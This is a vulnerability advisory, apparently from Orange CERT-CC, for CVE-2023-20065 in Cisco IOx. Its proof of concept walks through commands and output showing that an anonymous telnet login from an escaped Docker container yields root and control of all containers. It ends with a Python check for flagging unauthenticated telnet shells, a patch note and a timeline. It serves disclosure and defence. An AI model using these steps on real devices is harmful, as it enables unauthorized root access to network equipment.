Overview
Superuser access via anonymous telnet, giving superuser access on the CAF IOx and the ability to manage all Docker containers.
Details
From administrator access on a Docker container, it is possible to obtain privileged access to the CAF IOx equipment by connecting over telnet as an anonymous user.
Proof of Concept
From the Docker container (after the Docker container escape step):
# arp -a
? (<SWITCH_IP>) at 24:yy:yy:yy:yy:fa [ether] on eth0 // switch IP
? (<CAF_IP>) at 02:xx:xx:xx:xx:e3 [ether] on sss // CAF IOX IP
# ip addr
[...]
54: sss@if55: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 52:aa:aa:aa:aa:00 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet <IP_DOCKER_CONTAINER_sss_network>/27 brd 192.168.10.95 scope global sss
[...]
56: eth0@if57: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 52:54:dd:1a:13:c0 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet <IP_DOCKER_CONTAINER_eth0_network>/29 scope global eth0
[...]
# telnet <CAF_IP>
bc.Trying <CAF_IP>...
Connected to <CAF_IP>.
Escape character is '^]'.
Linux 5.4.158 (CF6-Stack1_1_RP_0) (7)
2022/08/22 12:40:28 : <anon> // anonymous connection here
[CF6-Stack1_1_RP_0:~]$ whoami
root
[CF6-Stack1_1_RP_0:~]$ docker ps
CONTAINER ID   IMAGE                                 COMMAND               STATUS       PORTS   NAMES                            CREATED
c4793cf47852   thousandeyes/enterprise-agent:4.1.0   "/sbin/my_pre_init"   Up 3 weeks           <docker_container>_Agent         3 weeks ago
f154475a57d5   cisco_sleep:latest                    "/sleep.sh"           Up 3 weeks           <docker_container>_Agent_sleep   3 weeks ago
Solution
Security patch
Upgrade to a patched Cisco IOS release, as described in the Cisco Security Advisory.
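Added example (not part of the original advisory, and not Cisco or Orange code): a Python audit check that classifies the bytes a telnet service sends before the client types anything, flagging the condition seen in the session on this page, where an `<anon>` marker and a shell prompt arrive with no credential prompt. The function names and both sample captures are constructed for illustration; the guarded capture is an assumed shape of a service that asks for credentials, not observed device output.

```python
import re

IAC, SB, SE = 255, 250, 240          # RFC 854 command bytes
NEGOTIATE = (251, 252, 253, 254)     # WILL, WONT, DO, DONT

def strip_negotiation(data: bytes) -> bytes:
    """Drop telnet IAC sequences so only the text the service printed remains."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] != IAC:
            out.append(data[i])
            i += 1
        elif i + 1 >= len(data):
            break                                   # capture cut off mid-command
        elif data[i + 1] == IAC:
            out.append(IAC)                         # escaped literal 0xFF
            i += 2
        elif data[i + 1] in NEGOTIATE:
            i += 3                                  # IAC, verb, option
        elif data[i + 1] == SB:
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2   # skip the subnegotiation
        else:
            i += 2                                  # two-byte command (NOP, GA, ...)
    return bytes(out)

# A credential prompt is a line that ENDS in "login:", "username:" or "password:",
# so a "Last login: <date>" notice is not mistaken for one.
CREDENTIAL_PROMPT = re.compile(r"(?im)\b(login|username|password)\s*:\s*$")
SHELL_PROMPT = re.compile(r"[$#]\s*\Z")   # capture ends at a shell prompt
ANON_MARKER = "<anon>"                    # as printed in the session on this page

def classify_greeting(raw: bytes) -> str:
    """Classify what a telnet service sent before the client typed anything."""
    text = strip_negotiation(raw).decode("latin-1")
    if CREDENTIAL_PROMPT.search(text):
        return "auth-required"
    if ANON_MARKER in text or SHELL_PROMPT.search(text):
        return "unauthenticated-shell"
    return "unknown"

# Constructed captures (not real device output).
OPEN = bytes([255, 253, 24, 255, 251, 1]) + (
    b"Linux 5.4.158 (host) (7)\r\n2022/08/22 12:40:28 : <anon>\r\n[host:~]$ ")
GUARDED = bytes([255, 251, 1]) + b"\r\nUser Access Verification\r\n\r\nUsername: "
```

`classify_greeting(OPEN)` returns `unauthenticated-shell` and `classify_greeting(GUARDED)` returns `auth-required`; any greeting that matches neither pattern is reported as `unknown` and needs a manual look.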
References
https://nvd.nist.gov/vuln/detail/CVE-2023-20065
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-priv-escalate-Xg8zkyPk
Credits
Orange CERT-CC
Frederic PREVOST at Orange group
Naima SADOUN at Orange group
Mickael DORIGNY at Orange group
Benoit MALABOEUF at Orange group
Timeline
Date reported: September 15, 2022
Date fixed: March 22, 2023